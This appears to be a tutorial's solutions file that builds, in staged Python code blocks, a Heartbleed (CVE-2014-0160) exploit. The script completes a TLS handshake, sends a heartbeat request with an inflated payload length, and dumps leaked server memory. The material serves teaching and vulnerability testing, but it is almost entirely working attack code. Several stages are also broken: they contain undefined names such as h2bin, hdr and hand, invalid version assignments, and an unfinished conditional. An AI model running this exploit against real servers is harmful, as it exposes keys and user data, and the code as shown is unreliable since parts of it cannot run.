========================================================= Exploiting CVE-2014-0160 Solutions ========================================================= --------------------------------------------------------- Build Your Command Center --------------------------------------------------------- .. sourcecode:: python __version__ = 0.0.0 import argparse def build_argument_parser(): parser = argparse.ArgumentParser(description=f""" ██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌ ░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Version: {__version__} """, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed") parser.add_argument(dest="port", type=int, help="the port which you wish to test for Heartbleed, default is 443", default=443) return parser.parse_args() if __name__ == '__main__': args = build_argument_parser() --------------------------------------------------------- Handling Sockets --------------------------------------------------------- .. sourcecode:: python __version__ = 0.0.0 import argparse import logging import socket def hex2bytes(payload: str): return bytes.fromhex(payload) hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') def build_argument_parser(): parser = argparse.ArgumentParser(description=f""" ██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌ ░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Version: {__version__} """, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed") parser.add_argument(dest="port", type=int, help="the port which you wish to test for Heartbleed, default is 443", default=443) return parser.parse_args() def main(runtime_options: argparse.Namespace): socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM) logging.info('Connecting...') socks.connect((args.host, args.port)) logging.info('Sending Client Hello...') socks.send(hello) if __name__ == '__main__': args = build_argument_parser() main(args) --------------------------------------------------------- Waiting for a Response & ``recvall()`` --------------------------------------------------------- .. sourcecode:: python __version__ = 0.0.0 import argparse import logging import socket import struct import hexdump def hex2bytes(payload: str): return bytes.fromhex(payload) hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') def recvall(sock, count): buf = b'' while count: newbuf = sock.recv(count) if not newbuf: return None buf += newbuf count -= len(newbuf) return buf def build_argument_parser(): parser = argparse.ArgumentParser(description=f""" ██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌ ░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Version: {__version__} """, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed") parser.add_argument(dest="port", type=int, help="the port which you wish to test for Heartbleed, default is 443", default=443) return parser.parse_args() def main(runtime_options: argparse.Namespace): socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM) logging.info('Connecting...') socks.connect((args.host, args.port)) logging.info('Sending Client Hello...') socks.send(hello) while True: header = socks.recv(5) (content_type, version, length) = struct.unpack('>BHH', hdr) handshake = recvall(s, length) logging.info(f"Received message: type={content_type}, ver={version}, length={len(hand)}") if content_type == 22 and ord(hand[0]) == 0x0E: break logging.info('Handshake done...') logging.info('Sending heartbeat request with length 4.') if __name__ == '__main__': args = build_argument_parser() main(args) --------------------------------------------------------- Exploiting Heartbleed --------------------------------------------------------- .. sourcecode:: python import argparse import logging import socket import struct import hexdump __version__ = '0.0.1' def h2bin(payload: str): return bytes.fromhex(payload) hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') heartbeat = h2bin(''' 18 03 02 00 03 01 40 00 ''') ''' Explanation of heartbeat (bf)call : 18 : hearbeat record 03 02 : TLS version 00 03 : length 01 : hearbeat request 40 00 : payload length 16 384 bytes check rfc6520 "The total length of a HeartbeatMessage MUST NOT exceed 2^14" If we enter FF FF -> 65 535, we will received 4 paquets of length 16 384 bytes ''' def identify_content_type(content_type_as_int: int): if content_type_as_int def hex_dump(sock: socket): print(hexdump.dump(sock, size=4, sep='-')) def recvall(sock: socket, count: int): buf = b'' while count: newbuf = sock.recv(count) if not newbuf: return None buf += newbuf count -= len(newbuf) return buf def test_heartbleed(sock: socket): # send heartbeat request to the server sock.send(heartbeat) # start listening the answer from the server while True: # we first get the 5 bytes of the request : content_type, version, length # http://wiki.wireshark.org/SSL content_version_length = sock.recv(5) if content_version_length is None: logging.warning('Unexpected EOF receiving record header - server closed connection') return False (content_type, version, length) = struct.unpack('>BHH', content_version_length) if content_type is None: logging.warning('No heartbeat response received, server likely not vulnerable') return False # we can't use s.recv(length) because the server can separate the packet heartbeat into different smaller packet payload = recvall(sock, length) if payload is None: logging.warning('Unexpected EOF receiving record payload - server closed connection') return False # heartbeat content type is 24 check rfc6520 if content_type == 24: print('Received heartbeat response in file out.txt') hex_dump(payload) if len(payload) > 3: logging.critical('Server returned more data than it should - server is vulnerable!') else: logging.warning('Server processed malformed heartbeat, but did not return any extra data.') return True # error if content_type == 21: logging.info('Received alert:') hex_dump(payload) logging.info('Server returned error, likely not vulnerable') return False def build_argument_parser(): parser = argparse.ArgumentParser(description=f""" ██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌ ░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Version: {__version__} """, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument(dest="host", help="the host that you wish to test for Heartbleed") parser.add_argument(dest="port", type=int, help="the port which you wish to test for Heartbleed, default is 443", default=443) return parser.parse_args() def main(runtime_options: argparse.Namespace): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) logging.info('Connecting...') sock.connect((runtime_options.host, runtime_options.port)) logging.info('Sending Client Hello...') sock.send(hello) # pass the handshake while True: hdr = sock.recv(5) (content_type, version, length) = struct.unpack('>BHH', hdr) hand = recvall(sock, length) logging.info(' ... received message: type = %d, ver = %04x, length = %d' % (content_type, version, len(hand))) # Look for server hello done message. if content_type == 22 and hex(hand[0]) == '0xe': break logging.info('Handshake done...') logging.info('Sending heartbeat request with length 4:') test_heartbleed(sock) if __name__ == '__main__': args = build_argument_parser() main(args)